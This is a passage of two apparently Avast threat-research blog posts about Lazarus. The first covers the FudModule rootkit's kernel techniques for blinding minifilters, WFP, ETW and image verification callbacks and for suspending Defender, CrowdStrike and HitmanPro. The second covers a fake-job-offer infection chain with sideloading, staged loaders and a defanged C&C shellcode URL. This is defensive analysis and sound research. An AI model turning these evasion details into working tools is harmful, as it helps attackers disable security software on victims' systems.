filecrypt.sys luafv.sys npsvctrig.sys wof.sys 
fileinfo.sys applockerfltr.sys bfs.sys 
Kernel modules that are allowlisted to preserve their file system minifilters.

If there was no driver name match, FudModule uses _FLT_FILTER.DefaultAltitude to make its ultimate decision. Callbacks are unlinked if the default altitude belongs either to the range [320000, 329999] (defined as FSFilter Anti-Virus by Microsoft) or the range [360000, 389999] (FSFilter Activity Monitor). Besides unlinking the callback nodes, FudModule also wipes the whole _FLT_INSTANCE.CallbackNodes array in the corresponding _FLT_INSTANCE structures. 

0x10 – Windows Filtering Platform 

Windows Filtering Platform (WFP) is a documented set of APIs designed for host-based network traffic filtering. The WFP API offers capabilities for deep packet inspection as well as for modification or dropping of packets at various layers of the network stack. This is very useful functionality, so it serves as a foundation for a lot of Windows network security software, including intrusion detection/prevention systems, firewalls, and network monitoring tools. The WFP API is accessible both in user and kernel space, with the kernel part offering more powerful functionality. Specifically, the kernel API allows for installing so-called callout drivers, which can essentially hook into the network stack and perform arbitrary actions on the processed network traffic. FudModule is trying to interfere with the installed callout routines in an attempt to disrupt the security they provide.  

This rootkit technique is executed only when Kaspersky drivers (klam.sys, klif.sys, klwfp.sys, klwtp.sys, klboot.sys) are present on the targeted system and at the same time Symantec/Broadcom drivers (symevnt.sys, bhdrvx64.sys, srtsp64.sys) are absent. This check appears to be a new addition in the current version of FudModule. In other aspects, our analysis revealed that the core idea of this technique matches the findings described by ESET researchers during their analysis of the previous version. 

Initially, FudModule resolves netio!WfpProcessFlowDelete to locate the address of netio!gWfpGlobal. As the name suggests, this is designed to store WFP-related global variables. Although its exact layout is undocumented, it is not hard to find the build-specific offset where a pointer to an array of WFP callout structures is stored (with the length of this array stored at an offset immediately preceding the pointer). FudModule follows this pointer and iterates over the array, skipping all callouts implemented in ndu.sys, tcpip.sys, mpsdrv.sys, or wtd.sys. For the remaining callouts, FudModule accesses the callout structure’s flags and sets the flag stored in the least significant bit. While the callout structure itself is undocumented, this particular 0x01 flag is documented in another structure, where it is called FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW. The documentation reads “if this flag is specified, the filter engine calls the callout driver’s classifyFn2 callout function only if there is a context associated with the data flow”. In other words, setting this flag will conditionally disable the callout in cases where no flow context is available (see the implementation of netio!IsActiveCallout below). 

The meaning of the FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW flag can be nicely seen in netio!IsActiveCallout. If this flag is set and no flow context can be obtained, IsActiveCallout will return false (see the highlighted part of the condition). 

While this rootkit technique has the potential to interfere with some WFP callouts, it will not be powerful enough to disrupt all of them. Many WFP callouts registered by security vendors already have the FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW flag set by design, so they will not be affected by this technique at all. Given the initial driver check, it seems like this technique might be targeted directly at Kaspersky. While Kaspersky does install dozens of WFP callouts, about half of those are designed for processing flows and already have the FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW flag set. Since we refrained from reverse engineering our competitor’s products, the actual impact of this rootkit technique remains unclear. 

0x20 – Missing 

So far, the rootkit techniques we analyzed were similar to those detailed by ESET in their paper on the earlier rootkit variant. But starting from now, we are getting into a whole new territory. The 0x20 technique, which used to deal with Event Tracing for Windows (ETW), has been deprecated, leaving the 0x20 bit unused. Instead, there are two new replacement techniques that target ETW, indexed with the bits 0x40 and 0x80. The indexing used to end at 0x40, which was a technique to obstruct forensic analysis by disabling prefetch file creation. However, now the bits go all the way up to 0x200, with two additional new techniques that we will delve into later in this blog. 

0x40 – Event Tracing for Windows: System Loggers

Event Tracing for Windows (ETW) serves as a high-performance mechanism dedicated to tracing and logging events. In a nutshell, its main purpose is to connect providers (who generate some log events) with consumers (who process the generated events). Consumers can define which events they would like to consume, for instance, by selecting some specific providers of interest. There are providers built into the operating system, like Microsoft-Windows-Kernel-Process which generates process-related events, such as process creation or termination. However, third-party applications can also define their custom providers.  

While many built-in providers are not security-related, some generate events useful for detection purposes. For instance, the Microsoft-Windows-Threat-Intelligence provider makes it possible to watch for suspicious events, such as writing another process’ memory. Furthermore, various security products take advantage of ETW by defining their custom providers and consumers. FudModule tampers with ETW internals in an attempt to intercept suspicious events and thus evade detection. 

The main idea behind this rootkit technique is to disable system loggers by zeroing out EtwpActiveSystemLoggers. The specific implementation of how this address is found varies based on the target Windows version. On newer builds, the nt!EtwSendTraceBuffer routine is resolved first and used to find nt!EtwpHostSiloState. This points to an _ETW_SILODRIVERSTATE structure, and using a hardcoded build-specific offset, the rootkit can access _ETW_SILODRIVERSTATE.SystemLoggerSettings.EtwpActiveSystemLoggers. On older builds, the rootkit first scans the entire ntoskrnl .text section, searching for opcode bytes specific to the EtwTraceKernelEvent prologue. The rootkit then extracts the target address from the mov ebx, cs:EtwpActiveSystemLoggers instruction that immediately follows. 

To understand the technique’s impact, we can take a look at how EtwpActiveSystemLoggers is used in the kernel. Accessed on a bit-by-bit basis, its least significant eight bits might be set in the EtwpStartLogger routine. This indicates that the value itself is a bit field, with each bit signifying whether a particular system logger is active. Looking at the other references to EtwpActiveSystemLoggers, a clear pattern emerges. After its value is read, there tends to be a loop guarded by a bsf instruction (bit scan forward). Inside the loop tends to be a call to an ETW-related routine that might generate a log event. The purpose of this loop is to iterate over the set bits of EtwpActiveSystemLoggers. When the rootkit clears all the bits, the body of the loop will never get executed, meaning the event will not get logged. 

Example decompilation of EtwpTraceKernelEventWithFilter. After the rootkit zeroes out EtwpActiveSystemLoggers, EtwpLogKernelEvent will never get called from inside the loop since the condition guarding the loop will always evaluate to zero. 

0x80 – Event Tracing for Windows: Provider GUIDs 

Complementing the previous technique, the 0x80 technique is also designed to blind ETW, however using a different approach. While the 0x40 technique was quite generic – aiming to disable all system loggers – this technique operates in a more surgical fashion. It contains a hardcoded list of 95 GUIDs, each representing an identifier for some specific ETW provider. The rootkit iterates over all these GUIDs and attempts to disable the respective providers. While this approach requires the attackers to invest some effort into assembling the list of GUIDs, it also offers them a finer degree of control over which ETW providers they will eventually disrupt. This allows them to selectively target providers that pose a higher detection risk and ignore the rest to minimize the rootkit’s impact on the target system. 

This technique starts by obtaining the address of EtwpHostSiloState (or EtwSiloState on older builds). If EtwpHostSiloState was already resolved during the previous technique, the rootkit just reuses the address. If not, the rootkit follows the reference chain PsGetCurrentServerSiloName -> PsGetCurrentServerSiloGlobals -> PspHostSiloGlobals -> EtwSiloState. In both scenarios, the result is that the rootkit just obtained a pointer to an _ETW_SILODRIVERSTATE structure, which contains a member named EtwpGuidHashTable. As the name suggests, this is a hash table holding ETW GUIDs (_ETW_GUID_ENTRY).  

FudModule then iterates over its hardcoded list of GUIDs and attempts to locate each of them in the hash table. Although the hash table internals are officially undocumented, Yarden Shafir provided a nice description in her blog on exploiting an ETW vulnerability. In a nutshell, the hash is computed by just splitting the 128-bit GUID into four 32-bit parts and XORing them together. By ANDing the hash with 0x3F, an index of the relevant hash bucket (_ETW_HASH_BUCKET) can be obtained. The bucket contains three linked lists of _ETW_GUID_ENTRY structures, each designated for a different type of GUIDs. FudModule always opts for the first one (EtwTraceGuidType) and traverses it, looking for the relevant _ETW_GUID_ENTRY structure. 

With a pointer to _ETW_GUID_ENTRY corresponding to a GUID of interest, FudModule proceeds to clear _ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled. The purpose of this modification seems self-explanatory: FudModule is trying to disable the ETW provider. To better understand how this works, let’s examine nt!EtwEventEnabled (see the decompiled code below). This is a routine that often serves as an if condition before nt!EtwWrite (or nt!EtwWriteEx) gets called.  

Looking at the decompilation, there are two return 1 statements. Setting ProviderEnableInfo.IsEnabled to zero ensures that the first one is never reached. However, the second return statement could still potentially execute. To make sure this doesn’t happen, the rootkit also iterates over all _ETW_REG_ENTRY structures from the _ETW_GUID_ENTRY.RegListHead linked list. For each of them, it makes a single doubleword write to zero out four masks, namely EnableMask, GroupEnableMask, HostEnableMask, and HostGroupEnableMask (or only EnableMask and GroupEnableMask on older builds, where the latter two masks were not yet introduced).  

Decompilation of nt!EtwEventEnabled. After the rootkit has finished its job, this routine will always return false for events related to the targeted GUIDs. This is because the rootkit cleared both _ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled and _ETW_REG_ENTRY.GroupEnableMask, forcing the highlighted conditions to fail. 

Clearing these masks also has an additional effect beyond making EtwEventEnabled always return false. These four are all also checked in EtwWriteEx and this modification effectively neutralizes this routine, as when no mask is set for a particular event registration object, execution will never proceed to a lower-level routine (nt!EtwpEventWriteFull) where the bulk of the actual event writing logic is implemented. 

0x100 – Image Verification Callbacks 

Image verification callbacks are yet another callback mechanism disrupted by FudModule. Designed similarly to process/thread/image callbacks, image verification callbacks are supposed to get invoked whenever a new driver image is loaded into kernel memory. This represents useful functionality for anti-malware software, which can leverage them to blocklist known malicious or vulnerable drivers (though there might be some problems with this blocking approach as the callbacks get invoked asynchronously). Furthermore, image verification callbacks also offer a valuable source of telemetry, providing visibility into suspicious driver load events. The callbacks can be registered using the SeRegisterImageVerificationCallback routine, which is publicly undocumented. As a result of this undocumented nature, the usage here is limited mainly to deep-rooted anti-malware software. For instance, Windows Defender registers a callback named WdFilter!MpImageVerificationCallback

As the kernel internally manages image verification callbacks in a similar fashion to some of the other callbacks we already explored, the rootkit’s removal implementation will undoubtedly seem familiar. First, the rootkit resolves the nt!SeRegisterImageVerificationCallback routine and scans its body to locate nt!ExCbSeImageVerificationDriverInfo. Dereferencing this, it obtains a pointer to a _CALLBACK_OBJECT structure, which holds the callbacks in the _CALLBACK_OBJECT.RegisteredCallbacks linked list. This list consists of _CALLBACK_REGISTRATION structures, where the actual callback function pointer can be found in _CALLBACK_REGISTRATION.CallbackFunction. FudModule clears the entire list by making the RegisteredCallbacks head LIST_ENTRY point directly to itself. Additionally, it also walks the original linked list and similarly short-circuits each individual _CALLBACK_REGISTRATION entry in the list. 

This rootkit technique is newly implemented in the current version of FudModule, and we can only speculate on the motivation here. It seems to be designed to help avoid detection when loading either a vulnerable or a malicious driver. However, it might be hard to understand why Lazarus should want to load an additional driver if they already have control over the kernel. It would make little sense for them to load a vulnerable driver, as they already established their kernel read/write primitive by exploiting a zero-day in a preinstalled Windows driver. Further, even if they were exploiting a vulnerable driver in the first place (as was the case in the previous version of FudModule), it would be simply too late to unlink the callback now. By the time this rootkit technique executes, the image verification callback for the vulnerable driver would have already been invoked. Therefore, we believe the most likely explanation is that the threat actors are preparing the grounds for loading some malicious driver later. Perhaps the idea is that they just want to be covered in case they decide to deploy some additional kernel-mode payload in the future. 

0x200 – Direct Attacks on Security Software 

The rootkit techniques we explored up to this point were all somewhat generic. Each targeted some security-related system component and, through it, indirectly interfered with all security software that relied on the component. In contrast, this final technique goes straight to the point and aims to directly disable specific security software. In particular, the targeted security solutions are AhnLab V3 Endpoint Security, Windows Defender, CrowdStrike Falcon, and HitmanPro. 

The attack starts with the rootkit obtaining the address of its own _EPROCESS structure. This is done using NtDuplicateHandle to duplicate the current process pseudohandle and then calling NtQuerySystemInformation to get SystemExtendedHandleInformation. With the extended handle information, the rootkit looks for an entry corresponding to the duplicated handle and obtains the _EPROCESS pointer from there. Using NtQuerySystemInformation to leak kernel pointers is a well-known technique that Microsoft aims to restrict by gradually building up mitigations. However, attackers capable of enabling SeDebugPrivilege at high integrity levels are out of scope of these mitigations, so FudModule can keep using this technique, even on the upcoming 24H2 builds. With the _EPROCESS pointer, FudModule disables mitigations by zeroing out _EPROCESS.MitigationFlags. Then, it also clears the EnableHandleExceptions flag from _EPROCESS.ObjectTable.Flags. We believe this is meant to increase stability in case something goes wrong later during the handle table entry manipulation technique that we will describe shortly.  

Regarding the specific technique used to attack the security solutions, AhnLab is handled differently than the other three targets. FudModule first checks if AhnLab is even running, by traversing the ActiveProcessLinks linked list and looking for a process named asdsvc.exe (AhnLab Smart Defense Service) with _EPROCESS.Token.AuthenticationId set to SYSTEM_LUID. If such a process is found, FudModule clears its _EPROCESS.Protection byte, effectively toggling off PPL protection for the process. While this asdsvc.exe process is under usual circumstances meant to be protected at the standard PsProtectedSignerAntimalware level, this modification makes it just a regular non-protected process. This opens it up to further attacks from user mode, where now even other privileged, yet non-protected processes could be able to tamper with it. However, we suspect the main idea behind this technique might be to disrupt the link between AhnLab’s user-mode and kernel-mode components. By removing the service’s PPL protection, the kernel-mode component might no longer recognize it as a legitimate AhnLab component. However, this is just a speculation as we didn’t test the real impact of this technique. 

Handle Table Entry Manipulation 

The technique employed to attack Defender, CrowdStrike, and HitmanPro is much more intriguing: FudModule attempts to suspend them using a new handle table entry manipulation technique. To better understand this technique, let’s begin with a brief background on handle tables. When user-mode code interacts with kernel objects such as processes, files, or mutexes, it typically doesn’t work with the objects directly. Instead, it references them indirectly through handles. Internally, the kernel must be able to translate the handle to the corresponding object, and this is where the handle table comes in. This per-process table, available at _EPROCESS.ObjectTable.TableCode, serves as a mapping from handles to the underlying objects. Organized as an array, it is indexed by the integer value of the handle. Each element is of type _HANDLE_TABLE_ENTRY and contains two crucial pieces of information: a (compressed) pointer to the object’s header (nt!_OBJECT_HEADER) and access bits associated with the handle. 

Due to this handle design, kernel object access checks are typically split into two separate logical steps. The first step happens when a process attempts to acquire a handle (such as opening a file with CreateFile). During this step, the current thread’s token is typically checked against the target object’s security descriptor to ensure that the thread is allowed to obtain a handle with the desired access mask. The second check takes place when a process performs an operation using an already acquired handle (such as writing to a file with WriteFile). This typically only involves verifying that the handle is powerful enough (meaning it has the right access bits) for the requested operation.  

FudModule executes as a non-protected process, so it theoretically shouldn’t be able to obtain a powerful handle to a PPL-protected process such as the CrowdStrike Falcon Service. However, leveraging the kernel read/write primitive, FudModule has the ability to access the handle table directly. This allows it to craft a custom handle table entry with control over both the referenced object and the access bits. This way, it can conjure an arbitrary handle to any object, completely bypassing the check typically needed for handle acquisition. What’s more, if it sets the handle’s access bits appropriately, it will also satisfy the subsequent handle checks when performing its desired operations. 

To prepare for the handle table entry manipulation technique, FudModule creates a dummy thread that just puts itself to sleep immediately. The thread itself is not important. What is important is that by calling CreateThread, the rootkit just obtained a thread handle with THREAD_ALL_ACCESS rights. This handle is the one that will have its handle table entry manipulated. Since it already has very powerful access bits, the rootkit will not even have to touch its _HANDLE_TABLE_ENTRY.GrantedAccessBits. All it needs to do is overwrite _HANDLE_TABLE_ENTRY.ObjectPointerBits to redirect the handle to an arbitrary object of its choice. This will make the handle reference that object and enable the rootkit to perform privileged operations on it. Note that ObjectPointerBits is not the whole pointer to the object: it only represents 44 bits of the 64-bit pointer. But since the _OBJECT_HEADER pointed to by ObjectPointerBits is guaranteed to be aligned (meaning the least significant four bits must be zero) and in kernel address space (meaning the most significant sixteen bits must be 0xFFFF), the remaining 20 bits can be easily inferred. 

A dummy thread whose handle will be the subject of handle table entry manipulation. 

The specific processes targeted by this technique are MsSense.exe, MsMpEng.exe, CSFalconService.exe, and hmpalert.exe. FudModule first finds their respective _EPROCESS structures, employing the same algorithm as it did to find the AhnLab service. Then, it performs a sanity check to ensure that the dummy thread handle is not too high by comparing it with _EPROCESS.ObjectTable.NextHandleNeedingPool (which holds information on the maximum possible handle value given the current handle table allocation size). With the sanity check satisfied, FudModule accesses the handle table itself (EPROCESS.ObjectTable.TableCode) and modifies the dummy thread’s _HANDLE_TABLE_ENTRY so that it points to the _OBJECT_HEADER of the target _EPROCESS. Finally, the rootkit uses the redirected handle to call NtSuspendProcess, which will suspend the targeted process.  

It might seem odd that the manipulated handle used to be a thread handle, but now it’s being used as a process handle. In practice, there is nothing wrong with this since the handle table itself holds no object type information. The object type is stored in _OBJECT_HEADER.TypeIndex so when the rootkit redirected the handle, it also effectively changed the handle object type. As for the access bits, the original THREAD_ALL_ACCESS gets reinterpreted in the new context as PROCESS_ALL_ACCESS since both constants share the same underlying value. 

The manipulated dummy thread handle (0x168), now referencing a process object. 

Though suspending the target process might initially appear to be a completed job, FudModule doesn’t stop here. After taking five seconds of sleep, it also attempts to iterate over all the threads in the target process, suspending them one by one. When all threads are suspended, FudModule uses NtResumeProcess to resume the suspended process. At this point, while the process itself is technically resumed, its individual threads remain suspended, meaning the process is still effectively in a suspended state. We can only speculate why Lazarus implemented process suspension this way, but it seems like an attempt to make the technique stealthier. After all, a suspended process is much more conspicuous than just several threads with increased suspend counts. 

To enumerate threads, FudModule calls NtQuerySystemInformation with the SystemExtendedHandleInformation class. Iterating over the returned handle information, FudModule searches for thread handles from the target process. The owner process is checked by comparing the PID of the target process with SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.UniqueProcessId and the type is checked by comparing SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.ObjectTypeIndex with the thread type index, which was previously obtained using NtQueryObject to get ObjectTypesInformation. For each enumerated thread (which might include some threads multiple times, as there might be more than one open handle to the same thread), FudModule manipulates the dummy thread handle so that it points to the enumerated thread and suspends it by calling SuspendThread on the manipulated handle. Finally, after all threads are suspended and the process resumed, FudModule restores the manipulated handle to its original state, once again referencing the dummy sleep thread. 

Conclusion 

The Lazarus Group remains among the most prolific and long-standing advanced persistent threat actors. Though their signature tactics and techniques are well-recognized by now, they still occasionally manage to surprise us with an unexpected level of technical sophistication. The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal. Recent updates examined in this blog show Lazarus’ commitment to keep actively developing this rootkit, focusing on improvements in both stealth and functionality. 

With their admin-to-kernel zero-day now burned, Lazarus is confronted with a significant challenge. They can either discover a new zero-day exploit or revert to their old BYOVD techniques. Regardless of their choice, we will continue closely monitoring their activity, eager to see how they will cope with these new circumstances. 

Indicators of Compromise (IoCs) 

A YARA rule for the latest FudModule variant is available at https://github.com/avast/ioc/tree/master/FudModule#yara.

The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams

18 April 2024 at 06:30

Key Points

  • Avast discovered a new campaign targeting specific individuals through fabricated job offers. 
  • Avast uncovered a full attack chain from infection vector to deploying “FudModule 2.0” rootkit with 0-day Admin -> Kernel exploit. 
  • Avast found a previously undocumented Kaolin RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from C&C server. We also believe it was loading FudModule along with a 0-day exploit. 

Introduction

In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is evident from previous research where the Lazarus group exploited vulnerable drivers and performed several rootkit techniques to effectively blind security products and achieve better persistence. 

In this instance, Lazarus sought to blind security products by exploiting a vulnerability in the default Windows driver, appid.sys (CVE-2024-21338). More information about this vulnerability can be found in a corresponding blog post

This indicates that Lazarus likely allocated additional resources to develop such attacks. Prior to exploitation, Lazarus deployed the toolset meticulously, employing fileless malware and encrypting the arsenal onto the hard drive, as detailed later in this blog post. 

Furthermore, the nature of the attack suggests that the victim was carefully selected and highly targeted, as there likely needed to be some level of rapport established with the victim before executing the initial binary. Deploying such a sophisticated toolset alongside the exploit indicates considerable resourcefulness. 

This blog post will present a technical analysis of each module within the entire attack chain. This analysis aims to establish connections between the toolset arsenal used by the Lazarus group and previously published research. 

Initial access 

The attacker initiates the attack by presenting a fabricated job offer to an unsuspecting individual, utilizing social engineering techniques to establish contact and build rapport. While the specific communication platform remains unknown, previous research by  Mandiant and ESET suggests potential delivery vectors may include LinkedIn, WhatsApp, email or other platforms. Subsequently, the attacker attempts to send a malicious ISO file, disguised as VNC tool, which is a part of the interviewing process. The choice of an ISO file is starting to be very attractive for attackers because, from Windows 10, an ISO file could be automatically mounted just by double clicking and the operating system will make the ISO content easily accessible. This may also serve as a potential Mark-of-the-Web (MotW) bypass. 

Since the attacker created rapport with the victim, the victim is tricked by the attacker to mount the ISO file, which contains three files: AmazonVNC.exe, version.dll and aws.cfg. This leads the victim to execute AmazonVNC.exe.  

The AmazonVNC.exe executable only pretends to be the Amazon VNC client, instead, it is a legitimate Windows application called choice.exe that ordinarily resides in the System32 folder. This executable is used for sideloading, to load the malicious version.dll through the legitimate choice.exe application. Sideloading is a popular technique among attackers for evading detection since the malicious DLL is executed in the context of a legitimate application.  

When AmazonVNC.exe gets executed, it loads version.dll. This malicious DLL is using native Windows API functions in an attempt to avoid defensive techniques such as user-mode API hooks. All native API functions are invoked by direct syscalls. The malicious functionality is implemented in one of the exported functions and not in DLL Main. There is no code in DLLMain it just returns 1, and in the other exported functions is just Sleep functionality. 

After the DLL obtains the correct syscall numbers for the current Windows version, it is ready to spawn an iexpress.exe process to host a further malicious payload that resides in the third file, aws.cfg. Injection is performed only if the Kaspersky antivirus is installed on the victim’s computer, which seems to be done to evade Kaspersky detection. If Kaspersky is not installed, the malware executes the payload by creating a thread in the current process, with no injection. The aws.cfg file, which is the next stage payload, is obfuscated by VMProtect, perhaps in an effort to make reverse engineering more difficult. The payload is capable of downloading shellcode from a Command and Control (C&C) server, which we believe is a legitimate hacked website selling marble material for construction. The official website is https://www[.]henraux.com/, and the attacker was able to download shellcode from https://www[.]henraux.com/sitemaps/about/about.asp 

In detailing our findings, we faced challenges extracting a shellcode from the C&C server as the malicious URL was unresponsive.  

By analyzing our telemetry, we uncovered potential threats in one of our clients, indicating a significant correlation between the loading of shellcode from the C&C server via an ISO file and the subsequent appearance of the RollFling, which is a new undocumented loader that we discovered and will delve into later in this blog post. 

Moreover, the delivery method of the ISO file exhibits tactical similarities to those employed by the Lazarus group, a fact previously noted by researchers from Mandiant and ESET

In addition, a RollSling sample was identified on the victim machines, displaying code similarities with the RollSling sample discussed in Microsoft’s research. Notably, the RollSling instance discovered in our client’s environment was delivered by the RollFling loader, confirming our belief in the connection between the absent shellcode and the initial loader RollFling. For visual confirmation, refer to the first screenshot showcasing the SHA of RollSling report code from Microsoft, while on the second screenshot is the code derived from our RollSling sample. 

Image illustrates the RollSling code identified by Microsoft. SHA:
d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca.
Image showcases the RollSling code discovered within our targe. SHA: 68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f.

In the next paragraphs, we are going to explain every component in the execution chain, starting with the initial RollFling loader, continuing with the subsequently loaded RollSling loader, and then the final RollMid loader. Finally, we will analyze the Kaolin RAT, which is ultimately loaded by the chain of these three loaders. 

Loaders

RollFling

The RollFling loader is a malicious DLL that is established as a service, indicating the attacker’s initial attempt at achieving persistence by registering as a service. Accompanying this RollFling loader are essential files crucial for the consistent execution of the attack chain. Its primary role is to kickstart the execution chain, where all subsequent stages operate exclusively in memory. Unfortunately, we were unable to ascertain whether the DLL file was installed as a service with administrator rights or just with standard user rights. 

The loader acquires the System Management BIOS (SMBIOS) table by utilizing the Windows API function GetSystemFirmwareTable. Beginning with Windows 10, version 1803, any user mode application can access SMBIOS information. SMBIOS serves as the primary standard for delivering management information through system firmware. 

By calling the GetSystemFirmwareTable (see Figure 1.) function, SMBIOSTableData is retrieved, and that SMBIOSTableData is used as a key for decrypting the encrypted RollSling loader by using the XOR operation. Without the correct SMBIOSTableData, which is a 32-byte-long key, the RollSling decryption process would be ineffective so the execution of the malware would not proceed to the next stage. This suggests a highly targeted attack aimed at a specific individual. 

This suggests that prior to the attacker establishing persistence by registering the RollFling loader as a service, they had to gather information about the SMBIOS table and transmit it to the C&C server. Subsequently, the C&C server could then reply with another stage. This additional stage, called  RollSling, is stored in the same folder as RollFling but with the ".nls" extension.  

After successful XOR decryption of RollSlingRollFling is now ready to load decrypted RollSling into memory and continue with the execution of RollSling

Figure 1: Obtaining SMBIOS firmware table provider

RollSling

The RollSling loader, initiated by RollFling, is executed in memory. This choice may help the attacker evade detection by security software. The primary function of RollSling is to locate a binary blob situated in the same folder as RollSling (or in the Package Cache folder). If the binary blob is not situated in the same folder as the RollSling, then the loader will look in the Package Cache folder. This binary blob holds various stages and configuration data essential for the malicious functionality. This binary blob must have been uploaded to the victim machine by some previous stage in the infection chain.  

The reasoning behind binary blob holding multiple files and configuration values is twofold. Firstly, it is more efficient to hold all the information in a single file and, secondly, most of the binary blob can be encrypted, which may add another layer of evasion meaning lowering the chance of detection.  

Rollsling is scanning the current folder, where it is looking for a specific binary blob. To determine which binary blob in the current folder is the right one, it first reads 4 bytes to determine the size of the data to read. Once the data is read, the bytes from the binary blob are reversed and saved in a temporary variable, afterwards, it goes through several conditions checks like the MZ header check. If the MZ header check is done, subsequently it looks for the “StartAction” export function from the extracted binary. If all conditions are met, then it will load the next stage RollMid in memory. The attackers in this case didn’t use any specific file name for a binary blob or any specific extension, to be able to easily find the binary blob in the folder. Instead, they have determined the right binary blob through several conditions, that binary blob had to meet. This is also one of the defensive evasion techniques for attackers to make it harder for defenders to find the binary blob in the infected machine. 

This stage represents the next stage in the execution chain, which is the third loader called RollMid which is also executed in the computer’s memory. 

Before the execution of the RollMid loader, the malware creates two folders, named in the following way: 

  • %driveLetter%:\\ProgramData\\Package Cache\\[0-9A-Z]{8}-DF09-AA86-YI78-[0-9A-Z]{12}\\ 
  • %driveLetter%:\\ProgramData\\Package Cache\\ [0-9A-Z]{8}-09C7-886E-II7F-[0-9A-Z]{12}\\ 

These folders serve as destinations for moving the binary blob, now renamed with a newly generated name and a ".cab" extension. RollSling loader will store the binary blob in the first created folder, and it will store a new temporary file, whose usage will be mentioned later, in the second created folder.  

The attacker utilizes the "Package Cache" folder, a common repository for software installation files, to better hide its malicious files in a folder full of legitimate files. In this approach, the attacker also leverages the ".cab" extension, which is the usual extension for the files located in the Package Cache folder. By employing this method, the attacker is trying to effectively avoid detection by relocating essential files to a trusted folder. 

In the end, the RollSling loader calls an exported function called "StartAction". This function is called with specific arguments, including information about the actual path of the RollFling loader, the path where the binary blob resides, and the path of a temporary file to be created by the RollMid loader. 

Figure 2: Looking for a binary blob in the same folder as the RollFling loader

RollMid

The responsibility of the RollMid loader lies in loading key components of the attack and configuration data from the binary blob, while also establishing communication with a C&C server. 

The binary blob, containing essential components and configuration data, serves as a critical element in the proper execution of the attack chain. Unfortunately, our attempts to obtain this binary blob were unsuccessful, leading to gaps in our full understanding of the attack. However, we were able to retrieve the RollMid loader and certain binaries stored in memory. 

Within the binary blob, the RollMid loader is a fundamental component located at the beginning (see Figure 3). The first 4 bytes in the binary blob describe the size of the RollMid loader. There are two more binaries stored in the binary blob after the RollMid loader as well as configuration data, which is located at the very end of the binary blob. These two other binaries and configuration data are additionally subject to compression and AES encryption, adding layers of security to the stored information.  

As depicted, the first four bytes enclosed in the initial yellow box describe the size of the RollMid loader. This specific information is also important for parsing, enabling the transition to the subsequent section within the binary blob. 

Located after the RollMid loader, there are two 4-byte values, distinguished by yellow and green colors. The former corresponds to the size of FIRST_ENCRYPTED_DLL section, while the latter (green box) signifies the size of SECOND_ENCRYPTED_DLL section. Notably, the second 4-byte value in the green box serves a dual purpose, not only describing a size but also at the same time constituting a part of the 16-byte AES key for decrypting the FIRST_ENCRYPTED_DLL section. Thanks to the provided information on the sizes of each encrypted DLL embedded in the binary blob, we are now equipped to access the configuration data section placed at the end of the binary blob. 

Figure 3: Structure of the Binary blob 

The RollMid loader requires the FIRST_DLL_BINARY for proper communication with the C&C server. However, before loading FIRST_DLL_BINARY, the RollMid loader must first decrypt the FIRST_ENCRYPTED_DLL section. 

The decryption process applies the AES algorithm, beginning with the parsing of the decryption key alongside an initialization vector to use for AES decryption. Subsequently, a decompression algorithm is applied to further extract the decrypted content. Following this, the decrypted FIRST_DLL_BINARY is loaded into memory, and the DllMain function is invoked to initialize the networking library. 

Unfortunately, as we were unable to obtain the binary blob, we didn’t get a chance to reverse engineer the FIRST_DLL_BINARY. This presents a limitation in our understanding, as the precise implementation details for the imported functions in the RollMid loader remain unknown. These imported functions include the following: 

  • SendDataFromUrl 
  • GetImageFromUrl 
  • GetHtmlFromUrl 
  • curl_global_cleanup 
  • curl_global_init 

After reviewing the exported functions by their names, it becomes apparent that these functions are likely tasked with facilitating communication with the C&C server. FIRST_DLL_BINARY also exports other functions beyond these five, some of which will be mentioned later in this blog.  

The names of these five imported functions imply that FIRST_DLL_BINARY is built upon the curl library (as can be seen by the names curl_global_cleanup and curl_global_init). In order to establish communication with the C&C servers, the RollMid loader employs the imported functions, utilizing HTTP requests as its preferred method of communication. 

The rationale behind opting for the curl library for sending HTTP requests may stem from various factors. One notable reason could be the efficiency gained by the attacker, who can save time and resources by leveraging the HTTP communication protocol. Additionally, the ease of use and seamless integration of the curl library into the code further support its selection. 

Prior to initiating communication with the C&C server, the malware is required to generate a dictionary filled with random words, as illustrated in Figure 4 below. Given the extensive size of the dictionary (which contains approximately hundreds of elements), we have included only a partial screenshot for reference purposes. The subsequent sections of this blog will delve into a comprehensive exploration of the role and application of this dictionary in the overall functionality of malware. 

Figure 4: Filling the main dictionary 

To establish communication with the C&C server, as illustrated in Figure 5, the malware must obtain the initial C&C addresses from the CONFIGURATION_DATA section. Upon decrypting these addresses, the malware initiates communication with the first layer of the C&C server through the GetHtmlFromUrl function, presumably using an HTTP GET request. The server responds with an HTML file containing the address of the second C&C server layer. Subsequently, the malware engages in communication with the second layer, employing the imported GetImageFromUrl function. The function name implies this performs a GET request to retrieve an image. 

In this scenario, the attackers employ steganography to conceal crucial data for use in the next execution phase. Regrettably, we were unable to ascertain the nature of the important data concealed within the image received from the second layer of the C&C server. 

Figure 5: Communication with C&C servers 

We are aware that the concealed data within the image serves as a parameter for a function responsible for transmitting data to the third C&C server. Through our analysis, we have determined that the acquired data from the image corresponds to another address of the third C&C server.  Communication with the third C&C server is initiated with a POST request.  

